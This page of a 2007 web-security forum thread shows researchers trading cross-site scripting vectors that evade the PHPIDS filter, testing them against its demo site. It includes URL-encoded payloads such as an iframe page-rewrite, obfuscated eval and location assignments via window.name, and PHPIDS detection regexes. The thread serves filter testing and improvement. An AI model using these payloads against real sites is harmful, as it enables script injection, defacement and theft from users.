Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123
Current Page: 3 of 3
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 07, 2007 11:10PM

Wow!

That was unexpected and I am speechless!

Web Application Security Journ(ey)al

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 08, 2007 05:15AM

Totally evil - awesome vector SDC!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 08, 2007 06:58AM

It's a pity XML predicates don't work in IE :(

This one is cross-browser, though:
http://demo.php-ids.org/?test=%24_%3Ddocument%2C%24__%3D%24_.URL%2C%24___%3Dunescape%2C%24_%3D%24_.body%2C%24_.innerHTML%20%3D%20%24___(http%3D%24__)#%3Ciframe%20src%3D%22javascript%3Atop.document.body.firstChild.nodeValue%3D''%2Calert('PWND%20%3A)')%22%3E%3C%2Fiframe%3E%3Cdiv%20style%3D'text-align%3A%20center%3B%20background%3A%20yellow'%3E%3Ch2%3EPWND%20by%20ma1%3C%2Fh2%3E%3Ca%20href%3D'http%3A%2F%2Fnoscript.net'%3EThere's%20a%20browser%20safer%20than%20Firefox...%20it's%20Firefox%2C%20with%20NoScript%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fbody%3E%3C%2Fhtml%3E

Have a nice Sunday :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 08, 2007 05:40PM

@.mario:
wow, that's been fast.
Starting to pant, like SDC :)

This one is still cross-browser, with some "bouncing":

http://hackademix.net/name.xss/http://demo.php-ids.org/?test=setTimeout//%0D%0A%28name//%0D%0A,0%29///payloadId=1

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 08, 2007 09:56PM

ma1 Wrote:
-------------------------------------------------------
> .mario Wrote:
> --------------------------------------------------
> -----
> > @Ronald: I agree when talking about GET
> Requests.
>
> So these are all illegal, right?
>
> http://en.wikipedia.org/wiki/Heroes_(TV_series%29
>
> http://kb.mozillazine.org/Label%3D%22%26blockImage
> Cmd._label%3B%22
>
> http://developer.mozilla.org/en/docs/Core_JavaScri
> pt_1.5_Reference:Global_Functions:eval
>
> And I didn't even add any query string :)
>
> As for the tilde character, ~, maybe you're too
> young to remember the time when most of the web
> URLs contained one (especially in .edu sites),
> because it's an Unix shortcut for user's home.
>
> Finally, ?param=& is quite common and legal, since
> it's sent every time an optional field is left
> empty in a form.


Yeah that's why Wikipedia sucks as an example because they work in a very different way by using a meta language, so that doesn't really counts. I mean in "normal" queries I never seen those chars, some do sure. But the only ones I use are pipes or spaces, which are pretty standard in developing. The rest I detect upon. While this said the quote set: ' " and less/greater signs > < without them (and illegal btw) it's is nearly impossible to construct a good injection, the rest is refinement upon them.

So when you detect them, you are half the way.

Oh yeah I'm way too old to remember the tilde ~
my first homepage had one, I'm close to 30 now, so I know this was a special reference character back then.

Just like: < > ' " chars are, ever saw one in a normal query?

Yeah, I know why I love standards, standards in developing just because of this mayhem alone.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 08, 2007 10:06PM

@.mario

clearly it's impossible to detect everything with RegExes alone, that is exactly why I block single chars like: ' " < > on the request uri in my .htaccess, cause they never happen, I have a few more but those are only for my site.

So like you proposed, I guess it would be a very good idea to have a triage upon such datasets. The previous examples are nice and all, but pretty useless to launch an sensible attack, Only a few characters that should be detect upon every instance.

Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 04:12AM

@all,@ma1: Nice ones aaand fixed ;) As already posted in the group the timed out one is pretty neat!

@Ronald: Yep - I guess we'll have to discuss that with christ1an and lars too but it thinks it's no bad idea. Let's chitchat later about the PHPIDS for PHP4 if you like. We are planning to release 0.3 an thursday and would be a nice feature to have this version aboard.

Greetings,
.mario

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 06:44AM

Vector of the day:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a=/ev///%0a.source%0aa%2b=/al///%0a.source%0aa%5ba%5d%20%28name%29***content

Slight variation:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a%3D/ev/%20%0A.source%0Aa%2B%3D/al/%20%0A.source%2Ca%20%3D%20a%5Ba%5D%0Aa%28name%29***content

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 07/09/2007 07:35AM by ma1.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Ivan
Date: July 09, 2007 09:12AM

Ronald wrote:

"Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now."

I agree with this, on some mine project I only block mentioned chars (' " < >), all anothers are allowed and properly handled with application logic.

http://www.security-net.biz/

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 10:09AM

@ma1: fixed and fixed

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 10:32AM

@.mario:
Since you're not satisfied yet with PHPIDS' newline attacks detection, one-liner here for fairness sake :)

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=b%3Dtop%2Ca%3D/loc/%20.%20source%2Ca%2B%3D/ation/%20.%20source%2Cb%5Ba%3Da%5D%20%3D%20name***content,

BTW, if anyone is interested I've just generalized name.xss for general consumption. Here's a "man page"

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 09, 2007 01:50PM

a=alert
a(0)

This harmless vector is still alive

Web Application Security Journ(ey)al

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 01:59PM

That little.. ******* ;) Thx kishord - almost forgot it!

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 02:34PM

@.mario:
Excuse my ignorance, but what's exactly the magic of "y" in

(?:[^y](?:hash|host|hostname|href|source|pathname|port|protocol|searcages|links|cookie|innerhtml|innertext|outerhtml)\s*(?:[^\w\s]|\n))]

and

(?:[^y](?:charat|charcodeat|concat|fromcharcode|indexof|lastindexof|match|replace|search|slice|split|substr|substring|escape)\s*(?:[^\w\s]|\n))

Probably related, why

&yport=80

is innocuous while

&xport=80

is almost as evil as the terrible

&port=80

? :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 2 time(s). Last edit at 07/09/2007 03:21PM by ma1.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 02:55PM

kishord Wrote:
-------------------------------------------------------
> a=alert
> a(0)
>
> This harmless vector is still alive

Speaking of super-simple stuff, this not so harmless one is too:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=location=name***content,post

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/09/2007 03:01PM by ma1.

Options: ReplyQuote
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 04:09PM

Hi!

The mysterious y is a relic from when we had lots of false positives by the yahoo page slurp spider - and since no critical JS function matches the pattern y\w+ we just fixed the issue that way.

The location=name vector is evil - i hate the self contained stuff via name because it's almost undetectable. I mean okay - you can detect location[^\w\s]\n*name but that would just catch the un-obfuscated ones.

Have to think about that...

Greetings,
.mario

Options: ReplyQuote
Pages: Previous123
Current Page: 3 of 3


Sorry, only registered users may post in this forum.